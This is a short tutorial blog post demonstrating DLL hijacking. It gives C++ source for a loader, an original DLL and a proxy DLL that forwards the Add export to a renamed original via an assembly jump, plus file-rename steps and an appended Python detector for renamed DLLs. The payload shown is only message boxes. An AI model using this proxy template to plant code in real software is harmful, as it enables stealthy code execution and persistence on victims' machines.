
DLL Hijacking Technique Example: HijackDll

Date: 2015-07-27 01:49:16


Console program: DllLoader

A DLL loader that dynamically loads the target DLL and dynamically calls the target function.

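#include <cstdio>
#include <cstdlib>
#include <windows.h>

// Signature of the Add function exported by Dll.dll
typedef int (*pAdd)(int a, int b);

int main()
{
    // Reuse the module if it is already loaded; otherwise load it by bare name,
    // which makes Windows resolve "Dll.dll" through the DLL search order
    HMODULE hModule = GetModuleHandleA("Dll.dll");
    if (NULL == hModule)
        hModule = LoadLibraryA("Dll.dll");

    // Resolve Add at run time (only if the module was actually loaded)
    pAdd Add = (NULL != hModule) ? (pAdd)GetProcAddress(hModule, "Add") : NULL;
    if (NULL == Add)
        printf("Failed\n");
    else
        printf("Succeed\n1 + 1 = %d\n", Add(1, 1));

    system("pause > nul");
    return 0;
}
main.cpp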

 

Original DLL: Dll

A very simple DLL with a single exported function, Add, which is just a simple addition.

#include <cstdio>
#include <windows.h>

#define EXTERNC extern "C"
#define EXPORT __declspec(dllexport)
#define ECEP EXTERNC EXPORT

// Show a message box on load and unload so it is visible which DLL was mapped
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch(fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        MessageBoxA(NULL, "Attach", "", MB_ICONINFORMATION);
        break;
    case DLL_PROCESS_DETACH:
        MessageBoxA(NULL, "Detach", "", MB_ICONINFORMATION);
        break;
    default:
        break;
    }

    return TRUE;
}

// The only export: plain integer addition
ECEP int Add(int a, int b)
{
    return a + b;
}
main.cpp

 

Hijacking DLL: HijackDll

Used to hijack the original DLL and forward the original program's dynamic calls to it.

//last code by gwsbhqt at 20150727

#include <cstdio>
#include <windows.h>

#define EXTERNC extern "C"
#define NAKED __declspec(naked)
#define EXPORT __declspec(dllexport)
#define ECEP EXTERNC EXPORT
#define ENCDECL EXTERNC NAKED void __cdecl
#define EENSTD EXTERNC EXPORT NAKED void __stdcall
#define EENFAST EXTERNC EXPORT NAKED void __fastcall
#define ENDEF ENCDECL

// Get (or load) the renamed original DLL and look up the real function.
// GetProcAddress returns the address in EAX, so JMP EAX forwards the call
// with the caller's arguments still on the stack (32-bit x86 MSVC only).
#define INITFARPROC(lpModuleName, hProcName) \
    HMODULE hModule; \
    hModule = GetModuleHandleA((lpModuleName)); \
    if (NULL == hModule) hModule = LoadLibraryA((lpModuleName)); \
    GetProcAddress(hModule, (hProcName)); \
    __asm JMP EAX;

// Export the forwarding stub under the original name and ordinal
#pragma comment (linker, "/EXPORT:Add=_Add,@1")

// Naked stub: no prologue/epilogue, so the original Add returns to the caller
ENDEF Add()
{
    INITFARPROC("Dll.tmp", "Add");
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        MessageBoxA(NULL, "Hijack Dll Attach", "", MB_ICONINFORMATION);
        break;
    case DLL_PROCESS_DETACH:
        MessageBoxA(NULL, "Hijack Dll Detach", "", MB_ICONINFORMATION);
        break;
    default:
        break;
    }

    return TRUE;
}
main.cpp

 

This is all very simple code; just read through it carefully.

 

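To test, just create a new solution containing three projects: one console program and two dynamic-link libraries.

Create a main.cpp file in each project, paste in the code, and build the solution. Then, in the Debug/Release folder, rename Dll.dll to Dll.tmp and rename HijackDll.dll to Dll.dll.

That completes the DLL hijack.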
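A defender-side check for the end state this procedure leaves on disk, as an added example that is not part of the original article: it scans a folder for files that are DLL images by header but carry an unexpected extension (like Dll.tmp) and notes whether a same-named .dll sits beside them. The function names, the extension allow-list and the sample header bytes are assumptions constructed for illustration.

```python
import struct
import tempfile
from pathlib import Path

IMAGE_FILE_DLL = 0x2000  # COFF Characteristics flag set on DLL images
# Extensions under which a PE image is normally expected (assumed allow-list)
EXPECTED_EXTS = {".dll", ".exe", ".sys", ".ocx", ".cpl", ".drv", ".scr", ".mui"}

def pe_characteristics(path):
    """Return the COFF Characteristics word if path is a PE image, else None."""
    with open(path, "rb") as f:
        head = f.read(0x40)
        if len(head) < 0x40 or head[:2] != b"MZ":
            return None
        (e_lfanew,) = struct.unpack_from("<I", head, 0x3C)
        f.seek(e_lfanew)
        nt = f.read(24)  # "PE\0\0" signature + 20-byte COFF file header
    if len(nt) < 24 or nt[:4] != b"PE\0\0":
        return None
    return struct.unpack_from("<H", nt, 22)[0]

def find_renamed_dlls(directory):
    """Return (file, same-stem .dll or None) for DLL images with an unusual extension."""
    findings = []
    for p in sorted(Path(directory).iterdir()):
        if not p.is_file() or p.suffix.lower() in EXPECTED_EXTS:
            continue
        flags = pe_characteristics(p)
        if flags is not None and flags & IMAGE_FILE_DLL:
            sibling = p.with_suffix(".dll")
            findings.append((p.name, sibling.name if sibling.is_file() else None))
    return findings

def make_sample_dll():
    """Constructed sample: minimal MZ/PE headers with the DLL flag, not a loadable image."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0, IMAGE_FILE_DLL | 0x0002)
    return dos + b"PE\0\0" + coff

def demo():
    """Recreate the page's end state (Dll.tmp beside Dll.dll) in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("Dll.dll", "Dll.tmp", "DllLoader.exe"):
            Path(d, name).write_bytes(make_sample_dll())
        Path(d, "readme.txt").write_text("MZ is not enough to be a PE file")
        return find_renamed_dlls(d)

if __name__ == "__main__":
    print(demo())
```

A hit with a same-stem .dll next to it is the pattern worth triaging first, since the .dll in that pair is the candidate proxy.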


Original article: http://www.cnblogs.com/gwsbhqt/p/4679088.html
